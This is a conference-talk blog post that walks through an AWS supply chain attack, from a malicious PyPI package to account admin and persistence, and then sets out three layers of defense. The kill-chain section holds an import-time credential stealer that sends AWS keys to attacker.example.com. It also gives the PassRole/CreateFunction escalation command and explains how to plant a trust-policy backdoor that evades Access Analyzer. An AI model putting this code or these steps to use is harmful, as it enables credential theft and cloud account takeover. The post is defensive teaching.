From pip install to Root: anatomy of an AWS supply chain attack

Mon, 29 Jun 2026 09:00:00 -0300

The scene is familiar: you add a dependency to the requirements.txt of your CI/CD pipeline, run pip install, and the installer terminates without warnings, with all dependencies resolved. Five minutes later someone on the internet is authenticated to your AWS account, has deployed a Lambda with administrative permissions and dumped your customer PII table, and you did not run anything else in that interval beyond that single pip install.

I demoed exactly that live at AWS Community Day Brasil 2026 on Saturday, June 27. The event was excellent, very well organized, and I was happy to see so many people wanting to learn AWS. This post is the step-by-step of the attack and the step-by-step of the defense.

Why this matters

Industry reports track supply chain attacks growing year over year, and the LiteLLM incident in March 2026 is a recent public example of the pattern. The litellm PyPI package was compromised for a window of approximately five hours, during which two malicious versions (1.82.7 and 1.82.8) shipped a credential stealer that executed at the moment of import litellm. It leaked AWS keys, SSH keys, and orchestration tokens to attacker-controlled infrastructure from every environment that ran pip install litellm without version pinning during the window. LiteLLM itself published a disclosure of the incident at docs.litellm.ai/blog/security-update-march-2026, with documented IoCs and a confirmed compromise window.

The detail that tends to get missed in this category of attack is that the target is CI/CD identities specifically, not the application credentials in production. CI/CD is where the most privileged identities live, because deploy pipelines need to create Lambdas, update policies, and do PassRole for a wide range of roles, which gives those identities broader IAM access than any production application. At the same time, those same pipelines routinely execute third-party code (PyPI packages, npm packages) as part of the build, creating the exact attack surface: high privilege combined with unaudited code execution.

The IAM role that processes your deploy probably has iam:PassRole on Resource: * and iam:UpdateAssumeRolePolicy, because the alternative of mapping every specific PassRole that some future deploy might need is tedious and rarely done correctly, even in mature pipelines. If a malicious package gets to execute inside that role, it inherits those permissions and uses them against you, which means you just gave root to someone who never interacted with your infrastructure directly.

The difference from other types of breach is that here you were not hacked by an external attacker who discovered a vulnerability in your application. You voluntarily installed your own compromise, with pip install, running the exact same command that will run a hundred more times in the coming months without ever triggering a single review.

The kill chain, live

In the demo I ran the full chain in three color-coded terminals side by side: victim in green, attacker in red, defender in cyan. The eight steps below follow the chronological order of execution, with the technical detail of what happens at each one.

1. Victim installs a package. The package called aws_lambda_utils_helpers looks like a utility helper for Lambda functions, with a name plausible enough to slip past a dependency code review:

pip install aws_lambda_utils_helpers

The installation completes without warnings, signature-based package scanners do not detect anything because the package is new enough to not have been cataloged yet, and the setup.py contains nothing visibly malicious to anyone doing a quick inspection.

2. The code imports the module. When the application runs from lambda_helpers import format_response during actual execution (in a Lambda, in an ECS container, or in the CI/CD runner), Python executes the __init__.py of the package before returning the imported module. This is the moment when the payload is executed, not the original pip install, which in this demo only copies files to the filesystem without invoking any of the package's code.

The content of the __init__.py in a simplified version for this post:

import os, socket, json, threading

def _exfil():
    creds = {
        "key": os.environ.get("AWS_ACCESS_KEY_ID"),
        "secret": os.environ.get("AWS_SECRET_ACCESS_KEY"),
        "token": os.environ.get("AWS_SESSION_TOKEN"),
    }
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("attacker.example.com", 4444))
    s.send(json.dumps(creds).encode())

threading.Thread(target=_exfil, daemon=True).start()

The choice of a daemon thread is deliberate, because the main process continues normally, the application responds with the expected latency, and no observable effect shows up in the Lambda logs, while the credentials leak in parallel over raw TCP to the endpoint controlled by the attacker.
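The import-time behavior that step 2 relies on can be reproduced harmlessly. The sketch below is not the demo code: it writes a throwaway package (the name demo_pkg_import_side_effect and the EVENTS list are made up for illustration) and shows that the top-level statements of its __init__.py run as a side effect of the import itself.

```python
import importlib
import sys
import tempfile
from pathlib import Path


def import_runs_init(package_name="demo_pkg_import_side_effect"):
    """Create a throwaway package and return what its __init__.py recorded."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg_dir = Path(tmp) / package_name
        pkg_dir.mkdir()
        # Top-level statements in __init__.py run once, at first import,
        # before the caller gets access to any name in the package.
        (pkg_dir / "__init__.py").write_text(
            "EVENTS = ['__init__ executed']\n"
            "def format_response(body):\n"
            "    return {'statusCode': 200, 'body': body}\n"
        )
        sys.path.insert(0, tmp)
        importlib.invalidate_caches()
        try:
            module = importlib.import_module(package_name)
            return list(module.EVENTS)
        finally:
            # Leave the interpreter as we found it.
            sys.path.remove(tmp)
            sys.modules.pop(package_name, None)


if __name__ == "__main__":
    print(import_runs_init())
```

The caller only asked for the module, yet the code in __init__.py already ran, which is why reviewing only the functions you call from a dependency is not enough.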

3. The environment variables are already there. In a Lambda function and in most CI/CD deploy runners, the STS credentials are exposed as environment variables, because that is the standard way the AWS SDK and CLI consume credentials in those contexts. In an ECS task they are one HTTP request away, served by the container credentials endpoint that the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable points to. Either way, the malicious package needs no vulnerability in the host and no privilege escalation at the operating system level: reading os.environ is enough, because the runtime delivers the credentials (or, on ECS, the pointer to them) in a form any code in the process can use.
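To see this exposure from the defender's side, a minimal sketch like the one below can be dropped into a build step. It reports only the names of credential-related variables visible to the process, never their values. The function name and the choice of variables to watch are my own assumptions, not part of the demo.

```python
import os

# Variable names the AWS SDKs and CLI read credentials (or a pointer to
# them) from. The list is an illustrative assumption, not exhaustive.
CREDENTIAL_VARS = (
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "AWS_SESSION_TOKEN",
    "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
    "AWS_CONTAINER_CREDENTIALS_FULL_URI",
)


def exposed_credential_vars(environ=None):
    """Return the names (never the values) of credential variables that are set."""
    env = os.environ if environ is None else environ
    return [name for name in CREDENTIAL_VARS if env.get(name)]


if __name__ == "__main__":
    # Anything printed here is readable by every package imported in this process.
    print(exposed_credential_vars())
```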

4. Attacker validates what was received. On the attacker side, a nc -l 4444 captures the JSON arriving over the socket, and the first reflex is to run aws sts get-caller-identity with the captured credentials, confirming that the session is authenticated as cicd-deploy-role and validating that the STS token is still active within its one-hour TTL before proceeding.

5. Reconnaissance. The attacker runs enumeration to map what this identity can do: which Lambda functions already exist, which roles have administrative permissions, and which of those roles trust lambda.amazonaws.com in the trust policy and therefore can be executed via Lambda. A very common pattern in production accounts is the existence of at least one legacy role with AdministratorAccess that trusts Lambda, typically created for some old project or at a moment when someone needed to debug something “quickly” and never had the role removed afterwards. I will call that role data-pipeline-role.
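The same question the attacker asks in this step is worth asking first as a defender. The sketch below assumes you have already exported a role inventory as a list of dictionaries. RoleName and AssumeRolePolicyDocument follow the shape IAM returns for a role, while AttachedPolicyNames is a hypothetical field you would fill in yourself from the attached-policy listing.

```python
def _as_list(value):
    """IAM policy fields may be a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def trusts_lambda(trust_policy):
    """True if any Allow statement lets lambda.amazonaws.com assume the role."""
    for stmt in _as_list(trust_policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "sts:AssumeRole" not in _as_list(stmt.get("Action", [])):
            continue
        principal = stmt.get("Principal", {})
        if not isinstance(principal, dict):
            continue  # e.g. Principal: "*", which is out of scope for this sketch
        if "lambda.amazonaws.com" in _as_list(principal.get("Service", [])):
            return True
    return False


def admin_roles_trusting_lambda(inventory):
    """Names of roles that both carry AdministratorAccess and trust Lambda."""
    return [
        role["RoleName"]
        for role in inventory
        if "AdministratorAccess" in role.get("AttachedPolicyNames", [])
        and trusts_lambda(role["AssumeRolePolicyDocument"])
    ]
```

Every name this returns is a role that a holder of iam:PassRole on * plus lambda:CreateFunction can turn into admin, which is the next step of the chain.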

6. PassRole + CreateFunction = admin. The CI/CD identity has iam:PassRole on * because deploy pipelines need to do PassRole for varied Lambdas, and has lambda:CreateFunction for the same reason. The attacker combines the two in a single call that creates a new Lambda passing data-pipeline-role as the execution role:

aws lambda create-function \
 --function-name exfil \
 --role arn:aws:iam::123456789012:role/data-pipeline-role \
 --runtime python3.12 \
 --handler index.handler \
 --zip-file fileb://payload.zip

The Lambda now executes as data-pipeline-role, which carries AdministratorAccess and can be assumed by Lambda through its trust policy, and invoking the function fires the attacker’s payload with full permissions in the AWS account. Less than 30 seconds after the malicious import, the attacker has the operational equivalent of admin in the account.

7. Smash and grab. The Lambda payload scans the DynamoDB customer table and dumps the PII rows back to the attacker’s endpoint. In the Community Day demo I showed 8 records, but the same code works with 8 million, given that the Lambda runs on compute billed to your account and the attacker does not spend a single byte of their own account quota on the processing. Five minutes from the original pip install to the PII rows leaving your AWS account through the exfiltration socket.

8. Persistence. The attacker knows the CI/CD STS credentials have a one-hour TTL and will soon be lost to natural token rotation. While they are still active, the attacker uses iam:UpdateAssumeRolePolicy (a permission the CI/CD policy carries and that step 6 did not need) to edit the trust policy of data-pipeline-role so that it trusts a role the attacker controls. That can be a role in another account or, in the more sophisticated pattern, a same-account role with a specific sts:ExternalId condition. When the original credentials expire, the backdoor stays planted, and the attacker can come back at any future moment by assuming that backup role.

The choice of same-account with ExternalId condition is deliberate to avoid detection, because “external trust” detectors like AWS Access Analyzer fire alerts when a role starts to trust a principal from another account or *, but same-account trust with a specific Principal and ExternalId condition slips past the heuristics those scanners use. You see no alert on the console, the security team gets no automated ticket, and the persistence sits planted, waiting for the attacker to come back whenever convenient.
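Because the backdoor hides behind a same-account principal, one way to catch it is to compare each trust policy against an explicit allowlist instead of asking only whether the principal is external. The following is a minimal sketch of that idea. The function name and the allowlist approach are my own assumptions, and it reads only the Principal element, ignoring NotPrincipal.

```python
def _as_list(value):
    """IAM policy fields may be a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def unexpected_principals(trust_policy, allowed):
    """Return principals trusted by Allow statements that are not in `allowed`.

    Conditions such as sts:ExternalId are deliberately ignored: a principal
    that nobody approved is reported whether or not a condition narrows it.
    """
    found = []
    for stmt in _as_list(trust_policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if isinstance(principal, dict):
            values = []
            for kind in ("AWS", "Service", "Federated"):
                values.extend(_as_list(principal.get(kind, [])))
        else:
            values = [principal]  # the bare "*" form
        for value in values:
            if value not in allowed and value not in found:
                found.append(value)
    return found
```

Run against data-pipeline-role with an allowlist containing only lambda.amazonaws.com, the same-account role planted in step 8 is reported even though it is not an external trust.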

Three layers of defense

None of the layers below blocks 100% of attacks by itself, but implemented together they block roughly 90% of attacks following this specific pattern. I list them from the earliest point in the kill chain to the latest, because the defense ROI drops as you delay detection further into the chain.

Layer 1: supply chain hygiene. The attack only works if the malicious package enters your build, so the first layer controls exactly what gets in:

Cooldowns on new packages, with versions published less than N days ago (I use 7 as a default) blocked at your internal package proxy (Nexus, Artifactory, or AWS CodeArtifact), because attackers need the package to be installed quickly after the compromise to capture as many credentials as possible before PyPI removes the package from the registry. A one-week cooldown defeats the window of opportunity for these attacks.
Strict version pinning, with aws_lambda_utils_helpers==1.2.3 instead of aws_lambda_utils_helpers>=1.2.0, combined with hash checking in requirements.txt (pip's --require-hashes mode) or the equivalent in your package manager (Poetry lock, package-lock.json, and so on), so that today’s build consumes exactly the same package that yesterday’s build did, rather than silently accepting a new version published in between.
Audit of recent imports, which is not a review of what has been in requirements.txt for years (the historical catalog), but a review of what entered requirements.txt last week, who added it, and why. Most of the risk concentrates in new imports, not in older imports that already passed through multiple builds and multiple eyes.
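The pinning and cooldown rules above are easy to check mechanically. The sketch below is a simplified illustration, not a replacement for your proxy's policy engine or for pip's own hash enforcement. The function names are mine, and the parser handles only plain name==version lines with backslash continuations.

```python
from datetime import datetime, timedelta, timezone


def unpinned_requirements(text):
    """Return requirement lines that lack an exact '==' pin or a '--hash=' option."""
    problems = []
    # Join backslash continuations so each requirement is one logical line.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "-")):
            continue  # blank lines, comments, and global options such as -r
        line = line.split(" #", 1)[0].strip()  # drop trailing comments
        if "==" not in line or "--hash=" not in line:
            problems.append(line)
    return problems


def past_cooldown(uploaded_at, now, days=7):
    """True once a release has been public for at least `days` days."""
    return now - uploaded_at >= timedelta(days=days)


if __name__ == "__main__":
    sample = "aws_lambda_utils_helpers>=1.2.0\n"
    print(unpinned_requirements(sample))
    uploaded = datetime(2026, 6, 25, tzinfo=timezone.utc)
    print(past_cooldown(uploaded, datetime(2026, 6, 29, tzinfo=timezone.utc)))
```

A check like this fits well in a pre-merge job, so that a loosened pin fails review before it ever reaches the deploy runner.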

Layer 2: identity hardening. If the malicious package is already running inside your Lambda or CI container, the defense has to be IAM, focused on two specific changes in the CI/CD identity policy:

Scope iam:PassRole to a closed set of safe roles instead of Resource: *, ideally a single role (cicd-lambda-safe-role) that carries only the minimum permissions necessary for application Lambda execution. With PassRole scoped this way, data-pipeline-role (the legacy role with AdministratorAccess) simply is not in the set of roles the attacker can pass to a new Lambda function, and the escalation to admin fails with AccessDenied at the moment of CreateFunction.
Remove iam:UpdateAssumeRolePolicy from the CI/CD policy, because legitimate pipelines almost never need to modify trust policies on existing roles. They create new roles, yes, but modifying the trust of a role that already exists is a rare and suspicious operation by default, and when you remove that permission the persistence via trust policy backdoor breaks at step 8 of the chain.

These two changes in the CI/CD policy JSON break the kill chain from step 6 onwards: scoped PassRole blocks the escalation to admin at the moment of creating the exfiltrator Lambda, and removing UpdateAssumeRolePolicy blocks the backdoor persistence. The attacker can still run the credential exfiltration, validation, and reconnaissance (steps 1 to 5 of the chain), but loses the ability to turn that into full account compromise.
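As an illustration of what the two changes could look like in the policy JSON, here is a minimal sketch that builds the relevant statements. The Sid values, the iam:PassedToService condition, and the explicit Deny are my additions beyond what the text prescribes (the text only asks for the permission to be removed), so treat them as one possible hardening, not as the policy from the demo.

```python
import json


def hardened_cicd_statements(account_id, safe_role_name="cicd-lambda-safe-role"):
    """Build the two IAM statements discussed above as a policy document."""
    safe_role_arn = f"arn:aws:iam::{account_id}:role/{safe_role_name}"
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                # PassRole is limited to one role, and only toward Lambda.
                "Sid": "PassOnlyTheSafeLambdaRole",
                "Effect": "Allow",
                "Action": "iam:PassRole",
                "Resource": safe_role_arn,
                "Condition": {
                    "StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}
                },
            },
            {
                # Assumption: an explicit Deny, so that a later broad Allow
                # cannot quietly bring the permission back.
                "Sid": "NeverEditTrustPolicies",
                "Effect": "Deny",
                "Action": "iam:UpdateAssumeRolePolicy",
                "Resource": "*",
            },
        ],
    }


if __name__ == "__main__":
    print(json.dumps(hardened_cicd_statements("123456789012"), indent=2))
```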

Layer 3: runtime detection. Even with the two previous layers in place, you should not trust that the policy is written perfectly, and therefore you monitor the actual execution:

CloudTrail with Athena (or the equivalent in your observability stack) with an alert on CreateFunction or UpdateFunctionConfiguration called by a CI/CD identity in production outside the expected deploy window. In a healthy account these events have low frequency and a predictable temporal profile, so any call outside that profile has high signal and merits immediate investigation.
Alert on UpdateAssumeRolePolicy without exception. This event is extremely rare in a well-operated production account, and any occurrence merits an immediate human look even when it comes from a known identity, because it is exactly the event that signals an attempt at trust policy backdoor persistence.
Network egress monitoring at the level of Lambda functions and ECS tasks, because raw TCP connections going out to non-AWS IPs are suspicious by default. Tools like AWS Network Firewall or DPI tooling at the VPC level let you alert or block this pattern before the credentials actually leave the perimeter.
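The first two alerts can be prototyped over exported CloudTrail records before you commit to an Athena query or an alerting rule. The sketch below assumes records shaped like CloudTrail JSON (eventName, eventTime, userIdentity.arn) and a deploy window expressed in UTC; the window values and the function name are placeholders. CloudTrail may record Lambda API calls with a version suffix (for example CreateFunction20150331), so the sketch matches on the prefix.

```python
from datetime import datetime, time

LAMBDA_EVENT_PREFIXES = ("CreateFunction", "UpdateFunctionConfiguration")


def suspicious_events(records, cicd_role_name,
                      window_start=time(9, 0), window_end=time(18, 0)):
    """Return (eventName, arn, reason) tuples for records worth a human look."""
    flagged = []
    for rec in records:
        name = rec.get("eventName", "")
        arn = rec.get("userIdentity", {}).get("arn", "")
        # Trust policy edits are flagged regardless of who made them or when.
        if name == "UpdateAssumeRolePolicy":
            flagged.append((name, arn, "trust policy modified"))
            continue
        if not name.startswith(LAMBDA_EVENT_PREFIXES):
            continue
        # Only the CI/CD identity is subject to the deploy-window rule.
        if f"assumed-role/{cicd_role_name}/" not in arn:
            continue
        when = datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ").time()
        if not (window_start <= when <= window_end):
            flagged.append((name, arn, "outside deploy window"))
    return flagged
```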

Have you already been compromised?

If you are reading this and suspect you may have been affected by a similar attack in the past months, there are three immediate queries to run on CloudTrail before going further: (1) lambda:CreateFunction or iam:UpdateAssumeRolePolicy calls coming from your CI/CD identity outside the expected deploy window in the last 90 days, (2) recent sts:AssumeRole events coming from IPs outside known AWS ranges, and (3) modifications to the trust policies of roles that carry administrative permissions. Any one of those three signals is reason to alert the security team and rotate credentials before doing anything else.

Three actions for Monday

You finished reading the post, and the post only has real value if you do something concrete with it. Here are three actions you can execute on Monday morning:

1. List the roles with iam:PassRole and Resource: * using your preferred tool (AWS CLI, Steampipe, CloudQuery, Access Analyzer, or whatever your organization standardized for IAM inventory). You will probably find that more than one role has this permission open this widely, and the recommendation is to start with CI/CD identities because those are the ones that most expose you to the attack pattern described in this post.

2. List the roles with iam:UpdateAssumeRolePolicy with the same tool, and for each one of them ask the direct question: does this role really need that permission in production, or was it granted at some moment by convenience and never reassessed afterwards? The correct answer for almost all of them is “does not need it”, and the corresponding action is to remove the permission.
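If your inventory tool can export policy documents as JSON, the first two actions reduce to a small scan. This is a simplified sketch under stated assumptions: it looks only at Allow statements with Action and Resource, treats only the literal * resource as wide open for PassRole, and ignores NotAction, NotResource, and conditions. The function name is my own.

```python
import fnmatch


def _as_list(value):
    """IAM policy fields may be a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def broad_iam_grants(policy_document):
    """Return (statement_index, action) pairs worth reviewing.

    iam:PassRole is reported only when granted on Resource "*";
    iam:UpdateAssumeRolePolicy is reported whenever it is granted at all.
    """
    findings = []
    statements = _as_list(policy_document.get("Statement", []))
    for index, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        for target in ("iam:PassRole", "iam:UpdateAssumeRolePolicy"):
            # IAM action names are case-insensitive and may contain wildcards.
            granted = any(fnmatch.fnmatchcase(target.lower(), a) for a in actions)
            if not granted:
                continue
            if target == "iam:PassRole" and "*" not in resources:
                continue
            findings.append((index, target))
    return findings
```

Matching with wildcards matters here, because a statement that allows iam:* grants both permissions without ever naming them.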

3. Audit the packages that entered your requirements.txt or package.json in the last 30 days, and for each new package answer: when was it published? By which author? Does the author have other publications before this one? Does the package have prior historical versions, or is it a single recent version with no release history? Packages that match the profile of “single, recent version, author with no history” merit careful manual investigation before you approve the next build with them included in requirements.
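Part of that profile can be computed from the metadata PyPI publishes for each project. The sketch below assumes a dictionary shaped like the response of PyPI's JSON API (a releases mapping from version to a list of files, each carrying upload_time_iso_8601) that you have already downloaded. The function name and the 30-day threshold are assumptions, and author history is not covered because that response alone does not provide it.

```python
from datetime import datetime, timedelta, timezone


def release_profile(metadata, now, recent_days=30):
    """Summarize release history from PyPI-style project metadata."""
    releases = metadata.get("releases", {})
    upload_times = []
    for files in releases.values():
        for file_info in files:
            stamp = file_info.get("upload_time_iso_8601")
            if stamp:
                # Older Python versions do not parse a trailing "Z" directly.
                upload_times.append(
                    datetime.fromisoformat(stamp.replace("Z", "+00:00"))
                )
    first_upload = min(upload_times) if upload_times else None
    is_recent = (
        first_upload is not None
        and now - first_upload < timedelta(days=recent_days)
    )
    return {
        "release_count": len(releases),
        "first_upload": first_upload,
        # The "single, recent version" half of the profile described above.
        "single_recent_version": len(releases) <= 1 and is_recent,
    }
```

A package that comes back with single_recent_version set to True is a candidate for the manual investigation described above, not an automatic verdict.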

The total work amounts to around three hours of engineering time, at roughly one hour per action. Protection: 90%+ of supply chain attacks in the format described in this post, blocked structurally. It is probably the best security ROI you can produce this month with the engineering time available in your calendar.

Slides and demo

The full presentation with the 11 slides and the live demo of the three terminals is available as a navigable deck: Full presentation deck. Use the keyboard arrows to navigate between slides, and the F key for fullscreen.

See you around, Leo